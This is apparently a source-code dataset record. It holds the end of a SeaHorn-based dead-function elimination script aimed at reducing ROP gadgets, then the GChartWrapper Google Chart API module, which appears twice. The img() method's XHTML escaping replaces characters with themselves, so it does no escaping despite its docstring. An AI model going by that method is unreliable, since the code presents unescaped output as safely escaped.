, '--cpu={0}'.format(cpu)
, '--mem={0}'.format(mem)]
if is_loop_free:
# the bound shouldn't affect for proving unreachability of the
# function but we need a global bound for all loops.
sea_args = ['bpf', '--bmc=mono', '--bound=3'] + \
sea_args + \
[ '--horn-bv-global-constraints=true'
, '--horn-bv-singleton-aliases=true'
, '--horn-bv-ignore-calloc=false'
, '--horn-at-most-one-predecessor']
sys.stderr.write('\tRunning SeaHorn with BMC engine on {0} ...\n'.format(fname))
else:
sea_args = ['pf'] + \
sea_args + \
[ '--horn-global-constraints=true'
, '--horn-singleton-aliases=true'
, '--horn-ignore-calloc=false'
, '--crab', '--crab-dom=int']
sys.stderr.write('\tRunning SeaHorn with Spacer+AI engine on {0} ...\n'.format(fname))
sea_args = sea_args + [sea_infile.name]
sb = stringbuffer.StringBuffer()
retcode= driver.run(sea_cmd, sea_args, sb, False)
status = check_status(str(sb))
if retcode == 0 and status:
# 3. If SeaHorn proved unreachability of the function then we
# add assume(false) at the entry of that function.
sys.stderr.write('SeaHorn proved unreachability of {0}!\n'.format(fname))
sea_outfile = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
sea_outfile.close()
args = ['--Preplace-verifier-calls-with-unreachable']
driver.previrt_progress(sea_infile.name, sea_outfile.name, args)
# 4. And, we run the optimized to remove that function
sea_opt_outfile = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
sea_opt_outfile.close()
optimize(sea_outfile.name, sea_opt_outfile.name)
return sea_opt_outfile.name
else:
sys.stderr.write('\tSeaHorn could not prove unreachability of {0}.\n'.format(fname))
if retcode <> 0:
sys.stderr.write('\t\tPossibly timeout or memory limits reached\n')
elif not status:
sys.stderr.write('\t\tSeaHorn got a counterexample\n')
return input_file
def precise_dce(input_file, ropfile, output_file):
""" use SeaHorn model-checker to remove dead functions
"""
sea_cmd = utils.get_seahorn()
if sea_cmd is None:
sys.stderr.write('SeaHorn not found. Aborting precise dce ...')
shutil.copy(input_file, output_file)
return False
cost_benefit_out = tempfile.NamedTemporaryFile(delete=False)
args = ['--Pcost-benefit-cg']
args += ['--Pbenefits-filename={0}'.format(ropfile)]
args += ['--Pcost-benefit-output={0}'.format(cost_benefit_out.name)]
driver.previrt(input_file, '/dev/null', args)
####
## TODO: make these parameters user-definable:
####
benefit_threshold = 20 ## number of ROP gadgets
cost_threshold = 3 ## number of loops
timeout = 120 ## SeaHorn timeout in seconds
memlimit = 4096 ## SeaHorn memory limit in MB
seahorn_queries = []
for line in cost_benefit_out:
tokens = line.split()
# Expected format of each token: FUNCTION BENEFIT COST
# where FUNCTION is a string, BENEFIT is an integer, and COST is an integer
if len(tokens) < 3:
sys.stderr.write('ERROR: unexpected format of {0}\n'.format(cost_benefit_out.name))
return False
fname = tokens[0]
fbenefit= int(tokens[1])
fcost = int(tokens[2])
if fbenefit >= benefit_threshold and fcost <= cost_threshold:
seahorn_queries.extend([(fname, fcost == 0)])
cost_benefit_out.close()
if seahorn_queries == []:
print "No queries for SeaHorn ..."
#####
## TODO: run SeaHorn instances in parallel
#####
change = False
curfile = input_file
for (fname, is_loop_free) in seahorn_queries:
if fname == 'main' or \
fname.startswith('devirt') or \
fname.startswith('seahorn'):
continue
nextfile = run_seahorn(sea_cmd, curfile, fname, is_loop_free, timeout, memlimit)
change = change | (curfile <> nextfile)
curfile = nextfile
shutil.copy(curfile, output_file)
return change
| 127 | 0 | 31 |
a371f4fac06296e177e959b547db9d31e5eb8257 | 24,893 | py | Python | GChartWrapper/GChart.py | dhilipsiva/google-chartwrapper | 3769aecbef6c83b6cd93ee72ece478ffe433ac57 | [
"BSD-3-Clause"
] | null | null | null | GChartWrapper/GChart.py | dhilipsiva/google-chartwrapper | 3769aecbef6c83b6cd93ee72ece478ffe433ac57 | [
"BSD-3-Clause"
] | 1 | 2019-01-14T05:09:15.000Z | 2019-01-14T05:09:15.000Z | GChartWrapper/GChart.py | dhilipsiva/google-chartwrapper | 3769aecbef6c83b6cd93ee72ece478ffe433ac57 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
################################################################################
# GChartWrapper - v0.8
# Copyright (C) 2009 Justin Quick <justquick@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as published
# by the Free Software Foundation.
#
# Thanks to anyone who does anything for this project.
# If you have even the smallest revision, please email me at above address.
################################################################################
"""
GChartWrapper - Google Chart API Wrapper
The wrapper can render the URL of the Google chart based on your parameters.
With the chart you can render an HTML img tag to insert into webpages on the fly,
show it directly in a webbrowser, or save the chart PNG to disk. New versions
can generate PIL PngImage instances.
Example
>>> G = GChart('lc',['simpleisbetterthancomplexcomplexisbetterthancomplicated'])
>>> G.title('The Zen of Python','00cc00',36)
>>> G.color('00cc00')
>>> str(G)
'http://chart.apis.google.com/chart?
chd=e:simpleisbetterthancomplexcomplexisbetterthancomplicated
&chs=300x150
&cht=lc
&chtt=The+Zen+of+Python'
>>> G.image() # PIL instance
<PngImagePlugin.PngImageFile instance at ...>
>>> 1#G.show() # Webbrowser open
True
>>> G.save('tmp.png') # Save to disk
'tmp.png'
See tests.py for unit test and other examples
"""
from GChartWrapper.constants import *
from GChartWrapper.encoding import Encoder
from copy import copy
def lookup_color(color):
"""
Returns the hex color for any valid css color name
>>> lookup_color('aliceblue')
'F0F8FF'
"""
if color is None: return
color = color.lower()
if color in COLOR_MAP:
return COLOR_MAP[color]
return color
def color_args(args, *indexes):
"""
Color a list of arguments on particular indexes
>>> c = color_args([None,'blue'], 1)
>>> c.next()
None
>>> c.next()
'0000FF'
"""
for i,arg in enumerate(args):
if i in indexes:
yield lookup_color(arg)
else:
yield arg
class Axes(dict):
"""
Axes attribute dictionary storage
Use this class via GChart(...).axes
Methods are taken one at a time, like so:
>>> G = GChart()
>>> G.axes.type('xy')
{}
>>> G.axes.label(1,'Label1') # X Axis
{}
>>> G.axes.label(2,'Label2') # Y Axis
{}
"""
def tick(self, index, length):
"""
Add tick marks in order of axes by width
APIPARAM: chxtc <axis index>,<length of tick mark>
"""
assert int(length) <= 25, 'Width cannot be more than 25'
self.data['ticks'].append('%s,%d'%(index,length))
return self.parent
def type(self, atype):
"""
Define the type of axes you wish to use
atype must be one of x,t,y,r
APIPARAM: chxt
"""
for char in atype:
assert char in 'xtyr', 'Invalid axes type: %s'%char
if not ',' in atype:
atype = ','.join(atype)
self['chxt'] = atype
return self.parent
__call__ = type
def label(self, index, *args):
"""
Label each axes one at a time
args are of the form <label 1>,...,<label n>
APIPARAM: chxl
"""
self.data['labels'].append(
str('%s:|%s'%(index, '|'.join(map(str,args)) )).replace('None','')
)
return self.parent
def position(self, index, *args):
"""
Set the label position of each axis, one at a time
args are of the form <label position 1>,...,<label position n>
APIPARAM: chxp
"""
self.data['positions'].append(
str('%s,%s'%(index, ','.join(map(str,args)))).replace('None','')
)
return self.parent
def range(self, index, *args):
"""
Set the range of each axis, one at a time
args are of the form <start of range>,<end of range>,<interval>
APIPARAM: chxr
"""
self.data['ranges'].append('%s,%s'%(index,
','.join(map(smart_str, args))))
return self.parent
def style(self, index, *args):
"""
Add style to your axis, one at a time
args are of the form::
<axis color>,
<font size>,
<alignment>,
<drawing control>,
<tick mark color>
APIPARAM: chxs
"""
args = color_args(args, 0)
self.data['styles'].append(
','.join([str(index)]+list(map(str,args)))
)
return self.parent
def render(self):
"""Render the axes data into the dict data"""
for opt,values in self.data.items():
if opt == 'ticks':
self['chxtc'] = '|'.join(values)
else:
self['chx%s'%opt[0]] = '|'.join(values)
return self
class GChart(dict):
"""Main chart class
Chart type must be valid for cht parameter
Dataset can be any python iterable and be multi dimensional
Kwargs will be put into chart API params if valid"""
@classmethod
def fromurl(cls, qs):
"""
Reverse a chart URL or dict into a GChart instance
>>> G = GChart.fromurl('http://chart.apis.google.com/chart?...')
>>> G
<GChartWrapper.GChart instance at...>
>>> G.image().save('chart.jpg','JPEG')
"""
if isinstance(qs, dict):
return cls(**qs)
return cls(**dict(parse_qsl(qs[qs.index('?')+1:])))
###################
# Callables
###################
def map(self, geo, country_codes):
"""
Creates a map of the defined geography with the given country/state codes
Geography choices are africa, asia, europe, middle_east, south_america, and world
ISO country codes can be found at http://code.google.com/apis/chart/isocodes.html
US state codes can be found at http://code.google.com/apis/chart/statecodes.html
APIPARAMS: chtm & chld
"""
assert geo in GEO, 'Geograpic area %s not recognized'%geo
self._geo = geo
self._ld = country_codes
return self
def level_data(self, *args):
"""
Just used in QRCode for the moment
args are error_correction,margin_size
APIPARAM: chld
"""
assert args[0].lower() in 'lmqh', 'Unknown EC level %s'%level
self['chld'] = '%s|%s'%args
return self
def bar(self, *args):
"""
For bar charts, specify bar thickness and spacing with the args
args are <bar width>,<space between bars>,<space between groups>
bar width can be relative or absolute, see the official doc
APIPARAM: chbh
"""
self['chbh'] = ','.join(map(str,args))
return self
def encoding(self, arg):
"""
Specifies the encoding to be used for the Encoder
Must be one of 'simple','text', or 'extended'
"""
self._encoding = arg
return self
def output_encoding(self, encoding):
"""
Output encoding to use for QRCode encoding
Must be one of 'Shift_JIS','UTF-8', or 'ISO-8859-1'
APIPARAM: choe
"""
assert encoding in ('Shift_JIS','UTF-8','ISO-8859-1'),\
'Unknown encoding %s'%encoding
self['choe'] = encoding
return self
def scale(self, *args):
"""
Scales the data down to the given size
args must be of the form::
<data set 1 minimum value>,
<data set 1 maximum value>,
<data set n minimum value>,
<data set n maximum value>
will only work with text encoding!
APIPARAM: chds
"""
self._scale = [','.join(map(smart_str, args))]
return self
def dataset(self, data, series=''):
"""
Update the chart's dataset, can be two dimensional or contain string data
"""
self._dataset = data
self._series = series
return self
def marker(self, *args):
"""
Defines markers one at a time for your graph
args are of the form::
<marker type>,
<color>,
<data set index>,
<data point>,
<size>,
<priority>
see the official developers doc for the complete spec
APIPARAM: chm
"""
if len(args[0]) == 1:
assert args[0] in MARKERS, 'Invalid marker type: %s'%args[0]
assert len(args) <= 6, 'Incorrect arguments %s'%str(args)
args = color_args(args, 1)
self.markers.append(','.join(map(str,args)) )
return self
def margin(self, left, right, top, bottom, lwidth=0, lheight=0):
"""
Set margins for chart area
args are of the form::
<left margin>,
<right margin>,
<top margin>,
<bottom margin>|
<legend width>,
<legend height>
APIPARAM: chma
"""
self['chma'] = '%d,%d,%d,%d' % (left, right, top, bottom)
if lwidth or lheight:
self['chma'] += '|%d,%d' % (lwidth, lheight)
return self
def line(self, *args):
"""
Called one at a time for each dataset
args are of the form::
<data set n line thickness>,
<length of line segment>,
<length of blank segment>
APIPARAM: chls
"""
self.lines.append(','.join(['%.1f'%x for x in map(float,args)]))
return self
def fill(self, *args):
"""
Apply a solid fill to your chart
args are of the form <fill type>,<fill style>,...
fill type must be one of c,bg,a
fill style must be one of s,lg,ls
the rest of the args refer to the particular style
APIPARAM: chf
"""
a,b = args[:2]
assert a in ('c','bg','a'), 'Fill type must be bg/c/a not %s'%a
assert b in ('s','lg','ls'), 'Fill style must be s/lg/ls not %s'%b
if len(args) == 3:
args = color_args(args, 2)
else:
args = color_args(args, 3,5)
self.fills.append(','.join(map(str,args)))
return self
def grid(self, *args):
"""
Apply a grid to your chart
args are of the form::
<x axis step size>,
<y axis step size>,
<length of line segment>,
<length of blank segment>
<x offset>,
<y offset>
APIPARAM: chg
"""
grids = map(str,map(float,args))
self['chg'] = ','.join(grids).replace('None','')
return self
def color(self, *args):
"""
Add a color for each dataset
args are of the form <color 1>,...<color n>
APIPARAM: chco
"""
args = color_args(args, *range(len(args)))
self['chco'] = ','.join(args)
return self
def type(self, type):
"""
Set the chart type, either Google API type or regular name
APIPARAM: cht
"""
self['cht'] = self.check_type(str(type))
return self
def label(self, *args):
"""
Add a simple label to your chart
call each time for each dataset
APIPARAM: chl
"""
if self['cht'] == 'qr':
self['chl'] = ''.join(map(str,args))
else:
self['chl'] = '|'.join(map(str,args))
return self
def legend(self, *args):
"""
Add a legend to your chart
call each time for each dataset
APIPARAM: chdl
"""
self['chdl'] = '|'.join(args)
return self
def legend_pos(self, pos):
"""
Define a position for your legend to occupy
APIPARAM: chdlp
"""
assert pos in LEGEND_POSITIONS, 'Unknown legend position: %s'%pos
self['chdlp'] = str(pos)
return self
def title(self, title, *args):
"""
Add a title to your chart
args are optional style params of the form <color>,<font size>
APIPARAMS: chtt,chts
"""
self['chtt'] = title
if args:
args = color_args(args, 0)
self['chts'] = ','.join(map(str,args))
return self
def size(self,*args):
"""
Set the size of the chart, args are width,height and can be tuple
APIPARAM: chs
"""
if len(args) == 2:
x,y = map(int,args)
else:
x,y = map(int,args[0])
self.check_size(x,y)
self['chs'] = '%dx%d'%(x,y)
return self
def orientation(self, angle):
"""
Set the chart dataset orientation
angle is <angle in radians>
APIPARAM: chp
"""
self['chp'] = '%f'%angle
return self
position = orientation
def render(self):
"""
Renders the chart context and axes into the dict data
"""
self.update(self.axes.render())
encoder = Encoder(self._encoding, None, self._series)
if not 'chs' in self:
self['chs'] = '300x150'
else:
size = self['chs'].split('x')
assert len(size) == 2, 'Invalid size, must be in the format WxH'
self.check_size(*map(int,size))
assert 'cht' in self, 'No chart type defined, use type method'
self['cht'] = self.check_type(self['cht'])
if ('any' in dir(self._dataset) and self._dataset.any()) or self._dataset:
self['chd'] = encoder.encode(self._dataset)
elif not 'choe' in self:
assert 'chd' in self, 'You must have a dataset, or use chd'
if self._scale:
assert self['chd'].startswith('t'),\
'You must use text encoding with chds'
self['chds'] = ','.join(self._scale)
if self._geo and self._ld:
self['chtm'] = self._geo
self['chld'] = self._ld
if self.lines:
self['chls'] = '|'.join(self.lines)
if self.markers:
self['chm'] = '|'.join(self.markers)
if self.fills:
self['chf'] = '|'.join(self.fills)
###################
# Checks
###################
def check_size(self,x,y):
"""
Make sure the chart size fits the standards
"""
assert x <= 1000, 'Width larger than 1,000'
assert y <= 1000, 'Height larger than 1,000'
assert x*y <= 300000, 'Resolution larger than 300,000'
def check_type(self, type):
"""Check to see if the type is either in TYPES or fits type name
Returns proper type
"""
if type in TYPES:
return type
tdict = dict(zip(TYPES,TYPES))
tdict.update({
'line': 'lc',
'bar': 'bvs',
'pie': 'p',
'venn': 'v',
'scater': 's',
'radar': 'r',
'meter': 'gom',
})
assert type in tdict, 'Invalid chart type: %s'%type
return tdict[type]
#####################
# Convience Functions
#####################
def getname(self):
"""
Gets the name of the chart, if it exists
"""
return self.get('chtt','')
def getdata(self):
"""
Returns the decoded dataset from chd param
"""
#XXX: Why again? not even sure decode works well
return Encoder(self._encoding).decode(self['chd'])
@property
def url(self):
"""
Returns the rendered URL of the chart
"""
self.render()
return self._apiurl + '&'.join(self._parts()).replace(' ','+')
def show(self, *args, **kwargs):
"""
Shows the chart URL in a webbrowser
Other arguments passed to webbrowser.open
"""
from webbrowser import open as webopen
return webopen(str(self), *args, **kwargs)
def save(self, fname=None):
"""
Download the chart from the URL into a filename as a PNG
The filename defaults to the chart title (chtt) if any
"""
if not fname:
fname = self.getname()
assert fname != None, 'You must specify a filename to save to'
if not fname.endswith('.png'):
fname += '.png'
try:
urlretrieve(self.url, fname)
except Exception:
raise IOError('Problem saving %s to file'%fname)
return fname
def img(self, **kwargs):
"""
Returns an XHTML <img/> tag of the chart
kwargs can be other img tag attributes, which are strictly enforced
uses strict escaping on the url, necessary for proper XHTML
"""
safe = 'src="%s" ' % self.url.replace('&','&').replace('<', '<')\
.replace('>', '>').replace('"', '"').replace( "'", ''')
for item in kwargs.items():
if not item[0] in IMGATTRS:
raise AttributeError('Invalid img tag attribute: %s'%item[0])
safe += '%s="%s" '%item
return '<img %s/>'%safe
def urlopen(self):
"""
Grabs readable PNG file pointer
"""
req = Request(str(self))
try:
return urlopen(req)
except HTTPError:
_print('The server couldn\'t fulfill the request.')
except URLError:
_print('We failed to reach a server.')
def image(self):
"""
Returns a PngImageFile instance of the chart
You must have PIL installed for this to work
"""
try:
try:
import Image
except ImportError:
from PIL import Image
except ImportError:
raise ImportError('You must install PIL to fetch image objects')
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
return Image.open(StringIO(self.urlopen().read()))
def write(self, fp):
"""
Writes out PNG image data in chunks to file pointer fp
fp must support w or wb
"""
urlfp = self.urlopen().fp
while 1:
try:
fp.write(urlfp.next())
except StopIteration:
return
def checksum(self):
"""
Returns the unique SHA1 hexdigest of the chart URL param parts
good for unittesting...
"""
self.render()
return new_sha(''.join(sorted(self._parts()))).hexdigest()
# Now a whole mess of convenience classes
# *for those of us who dont speak API*
########################################
# Now for something completely different
########################################
| 32.328571 | 89 | 0.528582 | # -*- coding: utf-8 -*-
################################################################################
# GChartWrapper - v0.8
# Copyright (C) 2009 Justin Quick <justquick@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as published
# by the Free Software Foundation.
#
# Thanks to anyone who does anything for this project.
# If you have even the smallest revision, please email me at above address.
################################################################################
"""
GChartWrapper - Google Chart API Wrapper
The wrapper can render the URL of the Google chart based on your parameters.
With the chart you can render an HTML img tag to insert into webpages on the fly,
show it directly in a webbrowser, or save the chart PNG to disk. New versions
can generate PIL PngImage instances.
Example
>>> G = GChart('lc',['simpleisbetterthancomplexcomplexisbetterthancomplicated'])
>>> G.title('The Zen of Python','00cc00',36)
>>> G.color('00cc00')
>>> str(G)
'http://chart.apis.google.com/chart?
chd=e:simpleisbetterthancomplexcomplexisbetterthancomplicated
&chs=300x150
&cht=lc
&chtt=The+Zen+of+Python'
>>> G.image() # PIL instance
<PngImagePlugin.PngImageFile instance at ...>
>>> 1#G.show() # Webbrowser open
True
>>> G.save('tmp.png') # Save to disk
'tmp.png'
See tests.py for unit test and other examples
"""
from GChartWrapper.constants import *
from GChartWrapper.encoding import Encoder
from copy import copy
def lookup_color(color):
"""
Returns the hex color for any valid css color name
>>> lookup_color('aliceblue')
'F0F8FF'
"""
if color is None: return
color = color.lower()
if color in COLOR_MAP:
return COLOR_MAP[color]
return color
def color_args(args, *indexes):
"""
Color a list of arguments on particular indexes
>>> c = color_args([None,'blue'], 1)
>>> c.next()
None
>>> c.next()
'0000FF'
"""
for i,arg in enumerate(args):
if i in indexes:
yield lookup_color(arg)
else:
yield arg
class Axes(dict):
"""
Axes attribute dictionary storage
Use this class via GChart(...).axes
Methods are taken one at a time, like so:
>>> G = GChart()
>>> G.axes.type('xy')
{}
>>> G.axes.label(1,'Label1') # X Axis
{}
>>> G.axes.label(2,'Label2') # Y Axis
{}
"""
def __repr__(self):
return '<GChart.Axes %s>' % dict(self.items())
def __init__(self, parent):
self.parent = parent
self.data = {'ticks':[],'labels':[],'positions':[],
'ranges':[],'styles':[]}
dict.__init__(self)
def tick(self, index, length):
"""
Add tick marks in order of axes by width
APIPARAM: chxtc <axis index>,<length of tick mark>
"""
assert int(length) <= 25, 'Width cannot be more than 25'
self.data['ticks'].append('%s,%d'%(index,length))
return self.parent
def type(self, atype):
"""
Define the type of axes you wish to use
atype must be one of x,t,y,r
APIPARAM: chxt
"""
for char in atype:
assert char in 'xtyr', 'Invalid axes type: %s'%char
if not ',' in atype:
atype = ','.join(atype)
self['chxt'] = atype
return self.parent
__call__ = type
def label(self, index, *args):
"""
Label each axes one at a time
args are of the form <label 1>,...,<label n>
APIPARAM: chxl
"""
self.data['labels'].append(
str('%s:|%s'%(index, '|'.join(map(str,args)) )).replace('None','')
)
return self.parent
def position(self, index, *args):
"""
Set the label position of each axis, one at a time
args are of the form <label position 1>,...,<label position n>
APIPARAM: chxp
"""
self.data['positions'].append(
str('%s,%s'%(index, ','.join(map(str,args)))).replace('None','')
)
return self.parent
def range(self, index, *args):
"""
Set the range of each axis, one at a time
args are of the form <start of range>,<end of range>,<interval>
APIPARAM: chxr
"""
self.data['ranges'].append('%s,%s'%(index,
','.join(map(smart_str, args))))
return self.parent
def style(self, index, *args):
"""
Add style to your axis, one at a time
args are of the form::
<axis color>,
<font size>,
<alignment>,
<drawing control>,
<tick mark color>
APIPARAM: chxs
"""
args = color_args(args, 0)
self.data['styles'].append(
','.join([str(index)]+list(map(str,args)))
)
return self.parent
def render(self):
"""Render the axes data into the dict data"""
for opt,values in self.data.items():
if opt == 'ticks':
self['chxtc'] = '|'.join(values)
else:
self['chx%s'%opt[0]] = '|'.join(values)
return self
class GChart(dict):
"""Main chart class
Chart type must be valid for cht parameter
Dataset can be any python iterable and be multi dimensional
Kwargs will be put into chart API params if valid"""
def __init__(self, ctype=None, dataset=[], **kwargs):
self._series = kwargs.pop('series',None)
self.lines,self.fills,self.markers,self.scales = [],[],[],[]
self._geo,self._ld = '',''
self._dataset = dataset
dict.__init__(self)
if ctype:
self['cht'] = self.check_type(ctype)
self._encoding = kwargs.pop('encoding', None)
self._scale = kwargs.pop('scale', None)
self._apiurl = kwargs.pop('apiurl', APIURL)
for k in kwargs:
assert k in APIPARAMS, 'Invalid chart parameter: %s' % k
self.update(kwargs)
self.axes = Axes(self)
@classmethod
def fromurl(cls, qs):
"""
Reverse a chart URL or dict into a GChart instance
>>> G = GChart.fromurl('http://chart.apis.google.com/chart?...')
>>> G
<GChartWrapper.GChart instance at...>
>>> G.image().save('chart.jpg','JPEG')
"""
if isinstance(qs, dict):
return cls(**qs)
return cls(**dict(parse_qsl(qs[qs.index('?')+1:])))
###################
# Callables
###################
def map(self, geo, country_codes):
"""
Creates a map of the defined geography with the given country/state codes
Geography choices are africa, asia, europe, middle_east, south_america, and world
ISO country codes can be found at http://code.google.com/apis/chart/isocodes.html
US state codes can be found at http://code.google.com/apis/chart/statecodes.html
APIPARAMS: chtm & chld
"""
assert geo in GEO, 'Geograpic area %s not recognized'%geo
self._geo = geo
self._ld = country_codes
return self
def level_data(self, *args):
"""
Just used in QRCode for the moment
args are error_correction,margin_size
APIPARAM: chld
"""
assert args[0].lower() in 'lmqh', 'Unknown EC level %s'%level
self['chld'] = '%s|%s'%args
return self
def bar(self, *args):
"""
For bar charts, specify bar thickness and spacing with the args
args are <bar width>,<space between bars>,<space between groups>
bar width can be relative or absolute, see the official doc
APIPARAM: chbh
"""
self['chbh'] = ','.join(map(str,args))
return self
def encoding(self, arg):
"""
Specifies the encoding to be used for the Encoder
Must be one of 'simple','text', or 'extended'
"""
self._encoding = arg
return self
def output_encoding(self, encoding):
"""
Output encoding to use for QRCode encoding
Must be one of 'Shift_JIS','UTF-8', or 'ISO-8859-1'
APIPARAM: choe
"""
assert encoding in ('Shift_JIS','UTF-8','ISO-8859-1'),\
'Unknown encoding %s'%encoding
self['choe'] = encoding
return self
def scale(self, *args):
"""
Scales the data down to the given size
args must be of the form::
<data set 1 minimum value>,
<data set 1 maximum value>,
<data set n minimum value>,
<data set n maximum value>
will only work with text encoding!
APIPARAM: chds
"""
self._scale = [','.join(map(smart_str, args))]
return self
def dataset(self, data, series=''):
"""
Update the chart's dataset, can be two dimensional or contain string data
"""
self._dataset = data
self._series = series
return self
def marker(self, *args):
"""
Defines markers one at a time for your graph
args are of the form::
<marker type>,
<color>,
<data set index>,
<data point>,
<size>,
<priority>
see the official developers doc for the complete spec
APIPARAM: chm
"""
if len(args[0]) == 1:
assert args[0] in MARKERS, 'Invalid marker type: %s'%args[0]
assert len(args) <= 6, 'Incorrect arguments %s'%str(args)
args = color_args(args, 1)
self.markers.append(','.join(map(str,args)) )
return self
def margin(self, left, right, top, bottom, lwidth=0, lheight=0):
"""
Set margins for chart area
args are of the form::
<left margin>,
<right margin>,
<top margin>,
<bottom margin>|
<legend width>,
<legend height>
APIPARAM: chma
"""
self['chma'] = '%d,%d,%d,%d' % (left, right, top, bottom)
if lwidth or lheight:
self['chma'] += '|%d,%d' % (lwidth, lheight)
return self
def line(self, *args):
"""
Called one at a time for each dataset
args are of the form::
<data set n line thickness>,
<length of line segment>,
<length of blank segment>
APIPARAM: chls
"""
self.lines.append(','.join(['%.1f'%x for x in map(float,args)]))
return self
def fill(self, *args):
"""
Apply a solid fill to your chart
args are of the form <fill type>,<fill style>,...
fill type must be one of c,bg,a
fill style must be one of s,lg,ls
the rest of the args refer to the particular style
APIPARAM: chf
"""
a,b = args[:2]
assert a in ('c','bg','a'), 'Fill type must be bg/c/a not %s'%a
assert b in ('s','lg','ls'), 'Fill style must be s/lg/ls not %s'%b
if len(args) == 3:
args = color_args(args, 2)
else:
args = color_args(args, 3,5)
self.fills.append(','.join(map(str,args)))
return self
def grid(self, *args):
"""
Apply a grid to your chart
args are of the form::
<x axis step size>,
<y axis step size>,
<length of line segment>,
<length of blank segment>
<x offset>,
<y offset>
APIPARAM: chg
"""
grids = map(str,map(float,args))
self['chg'] = ','.join(grids).replace('None','')
return self
def color(self, *args):
"""
Add a color for each dataset
args are of the form <color 1>,...<color n>
APIPARAM: chco
"""
args = color_args(args, *range(len(args)))
self['chco'] = ','.join(args)
return self
def type(self, type):
"""
Set the chart type, either Google API type or regular name
APIPARAM: cht
"""
self['cht'] = self.check_type(str(type))
return self
def label(self, *args):
"""
Add a simple label to your chart
call each time for each dataset
APIPARAM: chl
"""
if self['cht'] == 'qr':
self['chl'] = ''.join(map(str,args))
else:
self['chl'] = '|'.join(map(str,args))
return self
def legend(self, *args):
"""
Add a legend to your chart
call each time for each dataset
APIPARAM: chdl
"""
self['chdl'] = '|'.join(args)
return self
def legend_pos(self, pos):
"""
Define a position for your legend to occupy
APIPARAM: chdlp
"""
assert pos in LEGEND_POSITIONS, 'Unknown legend position: %s'%pos
self['chdlp'] = str(pos)
return self
def title(self, title, *args):
"""
Add a title to your chart
args are optional style params of the form <color>,<font size>
APIPARAMS: chtt,chts
"""
self['chtt'] = title
if args:
args = color_args(args, 0)
self['chts'] = ','.join(map(str,args))
return self
def size(self,*args):
"""
Set the size of the chart, args are width,height and can be tuple
APIPARAM: chs
"""
if len(args) == 2:
x,y = map(int,args)
else:
x,y = map(int,args[0])
self.check_size(x,y)
self['chs'] = '%dx%d'%(x,y)
return self
def orientation(self, angle):
"""
Set the chart dataset orientation
angle is <angle in radians>
APIPARAM: chp
"""
self['chp'] = '%f'%angle
return self
position = orientation
def render(self):
"""
Renders the chart context and axes into the dict data
"""
self.update(self.axes.render())
encoder = Encoder(self._encoding, None, self._series)
if not 'chs' in self:
self['chs'] = '300x150'
else:
size = self['chs'].split('x')
assert len(size) == 2, 'Invalid size, must be in the format WxH'
self.check_size(*map(int,size))
assert 'cht' in self, 'No chart type defined, use type method'
self['cht'] = self.check_type(self['cht'])
if ('any' in dir(self._dataset) and self._dataset.any()) or self._dataset:
self['chd'] = encoder.encode(self._dataset)
elif not 'choe' in self:
assert 'chd' in self, 'You must have a dataset, or use chd'
if self._scale:
assert self['chd'].startswith('t'),\
'You must use text encoding with chds'
self['chds'] = ','.join(self._scale)
if self._geo and self._ld:
self['chtm'] = self._geo
self['chld'] = self._ld
if self.lines:
self['chls'] = '|'.join(self.lines)
if self.markers:
self['chm'] = '|'.join(self.markers)
if self.fills:
self['chf'] = '|'.join(self.fills)
###################
# Checks
###################
def check_size(self,x,y):
"""
Make sure the chart size fits the standards
"""
assert x <= 1000, 'Width larger than 1,000'
assert y <= 1000, 'Height larger than 1,000'
assert x*y <= 300000, 'Resolution larger than 300,000'
def check_type(self, type):
"""Check to see if the type is either in TYPES or fits type name
Returns proper type
"""
if type in TYPES:
return type
tdict = dict(zip(TYPES,TYPES))
tdict.update({
'line': 'lc',
'bar': 'bvs',
'pie': 'p',
'venn': 'v',
'scater': 's',
'radar': 'r',
'meter': 'gom',
})
assert type in tdict, 'Invalid chart type: %s'%type
return tdict[type]
#####################
# Convience Functions
#####################
def getname(self):
"""
Gets the name of the chart, if it exists
"""
return self.get('chtt','')
def getdata(self):
"""
Returns the decoded dataset from chd param
"""
#XXX: Why again? not even sure decode works well
return Encoder(self._encoding).decode(self['chd'])
def _parts(self):
return ('%s=%s'%(k,smart_str(v)) for k,v in sorted(self.items()) if v)
def __str__(self):
return self.url
def __repr__(self):
return '<GChart.%s %s>'%(self.__class__.__name__, dict(self.items()))
@property
def url(self):
"""
Returns the rendered URL of the chart
"""
self.render()
return self._apiurl + '&'.join(self._parts()).replace(' ','+')
def show(self, *args, **kwargs):
"""
Shows the chart URL in a webbrowser
Other arguments passed to webbrowser.open
"""
from webbrowser import open as webopen
return webopen(str(self), *args, **kwargs)
def save(self, fname=None):
"""
Download the chart from the URL into a filename as a PNG
The filename defaults to the chart title (chtt) if any
"""
if not fname:
fname = self.getname()
assert fname != None, 'You must specify a filename to save to'
if not fname.endswith('.png'):
fname += '.png'
try:
urlretrieve(self.url, fname)
except Exception:
raise IOError('Problem saving %s to file'%fname)
return fname
def img(self, **kwargs):
"""
Returns an XHTML <img/> tag of the chart
kwargs can be other img tag attributes, which are strictly enforced
uses strict escaping on the url, necessary for proper XHTML
"""
safe = 'src="%s" ' % self.url.replace('&','&').replace('<', '<')\
.replace('>', '>').replace('"', '"').replace( "'", ''')
for item in kwargs.items():
if not item[0] in IMGATTRS:
raise AttributeError('Invalid img tag attribute: %s'%item[0])
safe += '%s="%s" '%item
return '<img %s/>'%safe
def urlopen(self):
"""
Grabs readable PNG file pointer
"""
req = Request(str(self))
try:
return urlopen(req)
except HTTPError:
_print('The server couldn\'t fulfill the request.')
except URLError:
_print('We failed to reach a server.')
def image(self):
"""
Returns a PngImageFile instance of the chart
You must have PIL installed for this to work
"""
try:
try:
import Image
except ImportError:
from PIL import Image
except ImportError:
raise ImportError('You must install PIL to fetch image objects')
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
return Image.open(StringIO(self.urlopen().read()))
def write(self, fp):
"""
Writes out PNG image data in chunks to file pointer fp
fp must support w or wb
"""
urlfp = self.urlopen().fp
while 1:
try:
fp.write(urlfp.next())
except StopIteration:
return
def checksum(self):
"""
Returns the unique SHA1 hexdigest of the chart URL param parts
good for unittesting...
"""
self.render()
